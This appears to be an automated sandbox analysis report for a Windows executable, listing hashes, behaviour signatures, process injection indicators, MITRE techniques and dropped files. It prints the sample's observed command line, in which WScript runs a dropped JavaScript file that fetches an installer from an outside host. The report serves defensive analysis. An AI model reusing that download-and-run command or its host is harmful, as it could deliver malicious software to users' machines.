0ff633213d9774ddb50670a948ce2c8e7986143f5de07ed5dba5fba8f4e51dca

Analysis

max time kernel
122s
max time network
124s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
21-05-2024 16:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe
Size

184KB
MD5

63e62edb0d50e82e478cb3d133e2219c
SHA1

9886ab1530a30941a29b7edfe0bbb3fa87af7e3a
SHA256

0ff633213d9774ddb50670a948ce2c8e7986143f5de07ed5dba5fba8f4e51dca
SHA512

222f94bd9d0668d94b945f49b89ae2df8f663335efb65ac8b5cb552444fa0e341b6507a2ec655f09595d40957896ab84224729517dc1a626e22fb35f1ba9e304
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO37:/7BSH8zUB+nGESaaRvoB7FJNndne

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

flow	pid	process
6	1608	WScript.exe
8	1608	WScript.exe
10	1608	WScript.exe
12	2392	WScript.exe
13	2392	WScript.exe
15	2844	WScript.exe
16	2844	WScript.exe
18	1020	WScript.exe
19	1020	WScript.exe
21	2916	WScript.exe
22	2916	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe

description	pid	process	target process
PID 1728 wrote to memory of 1608	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 1608	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 1608	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 1608	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2392	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2392	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2392	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2392	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2844	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2844	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2844	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2844	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 1020	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 1020	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 1020	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 1020	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2916	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2916	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2916	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe
PID 1728 wrote to memory of 2916	1728	63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\63e62edb0d50e82e478cb3d133e2219c_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufD2A.js" http://www.djapp.info/?domain=BKLPqZrYiV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufD2A.exe
2⤵
- Blocklisted process makes network request
PID:1608

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufD2A.js" http://www.djapp.info/?domain=BKLPqZrYiV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufD2A.exe
2⤵
- Blocklisted process makes network request
PID:2392

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufD2A.js" http://www.djapp.info/?domain=BKLPqZrYiV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufD2A.exe
2⤵
- Blocklisted process makes network request
PID:2844

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufD2A.js" http://www.djapp.info/?domain=BKLPqZrYiV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufD2A.exe
2⤵
- Blocklisted process makes network request
PID:1020

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufD2A.js" http://www.djapp.info/?domain=BKLPqZrYiV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufD2A.exe
2⤵
- Blocklisted process makes network request
PID:2916

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
df80f9ba75076db634761b6132e0d4e3

SHA1
07983946fb660752c7cccb2ef82d01ec4c9ecc5d

SHA256
d5ff96fd8b416de93a85783192206224cf8821c240cd8ff755f2e8270153dd99

SHA512
4ec734c5d29e9ce00b00e42b627253195e8c7a158433fedfcee428e692a6501981c33d7c8a39235f8b691f087145cdbe660b430493edbeedb12588c5cdd5a66a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
afe9cffb56ae7f012a1361442a5c8be7

SHA1
54560228ba3e61b18c577899e31b66a3db5fa0c6

SHA256
497b8d8c164312addeda03ef3baacc456ec92fd1c546d85161455b4183641211

SHA512
135d691cdbef9801fb31e6a930dc6115e91ebbe613d992352194c04de4f9f086ef0b74113ed156df501b670f1030f58f720b82d9747157c71c13c8987fb49a0c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
3de9c5693b0a89b34c1ecdd8a6fbba16

SHA1
4f8db1a3de85ad2e1568273d889bddc76c38452e

SHA256
08b1e5a71a138310353a72bfc0b285649a601daf8a68b3d4b0064303ea9d67ce

SHA512
fc98a0e05b1c23f4d956b4923686a6164237b1676e954bec1af139d156e061d06eebbb00f2d37a6916126c37e1b0e16dc6ef67105295a0d99c14904e5e4d7e72

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
7c612c36b3ae479e364e6ba1c7602a5b

SHA1
69d02db77fade24c7a501a97f769843e6b05d2b8

SHA256
4c5c0940cc7cd05955a67ec9bd271d3bc8ab5252ba6a2a01f227a7415573904c

SHA512
b39fdd29e395fa96e0eb122cde63a069a8134b48c06080ae067f65f854bdeddd859fe0ccea8a615c434059efec3337d23983e3faa62aded1106c98219f14b897

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm
Filesize
40KB

MD5
d0b1f3bfcfd11cf7e1bbaab57291c2d4

SHA1
6fe07a3f288e4661a7a79a5c4c8e212882ee1dde

SHA256
6bb42dfc6131c6e4d644fffc7c49f409e6dd6da2f62d1a148765bd7ccac5e251

SHA512
2a736f091863ce6c21587152afcdd074dc7fbe35deeaed5058e7d111e375c00881fe4893ccaccfa0199e4affe57ab8fe51ea71349ac3f5d18a20bda6988d46c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm
Filesize
6KB

MD5
32873fdf6a82b77d6ebde3e1f3817c58

SHA1
bd695ee1787cac7e4479c4af6fc5bf3a23a2500d

SHA256
c8d9f711af2716995cc0dab22d6bc63a3b28d45b4acce9626c285ef7cf941579

SHA512
da0bfcf927a9420146296329e93a5cc69334785f30df2aed4b610bd2ff9e25271dbe83bd008f153a2b8be03fea92b83de9ef257b2034c2a8fb30323afbe4bde0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm
Filesize
40KB

MD5
55ce2a462b2a2fc7507680e14d9cc6ff

SHA1
a0fd506854cf0e1f0dbcc6f66601f26e0ce4a920

SHA256
c4476e90a3eb56d724e8e585084f321c98f9c889e882655e0d99963260b22f4f

SHA512
85e80242b071b8321abce1502092d6f01bb351b97a9632a821f3a2df71ed7f88ba393697f5192a96c27565fd9a362a2e9516200cca3e39bde5ae395f7e03aff2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm
Filesize
40KB

MD5
ccf92a6afa49687e8304ad080baccadc

SHA1
06a89f9a6e43e85ce4c17168b2793e530b437fa1

SHA256
0296df88d22938c9b127ac0859e3dc0200e8f368e77d33851458ac1a90f149d0

SHA512
3a1bfed7132f942985efd3322d52f55400f070c13070f83bc357d38110373ad0c7c7cf05d9213331f1eec935eaf2d1ab2ee2c5cff7c351e26d8610527c9195fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3CE1.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5523.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufD2A.js
Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\JUV61CB5.txt
Filesize
177B

MD5
b14de1da3012dfebba613f6db719cfea

SHA1
85d5654a1d7652ff7552731a8b157d30e877dcd0

SHA256
42a945f4466fda6da7e65df91bef8a3f9eaf8db1fbb00e2be94c389a9dc459b0

SHA512
c4668aeb7665f31bfb15a18e2d452ae2233d3dc76a744d066b352f38ff74e4053df3f84b07b61cd084b303f5bfd7da4d39ae4312351193ba56a538e59c7e2ac8

Download Submit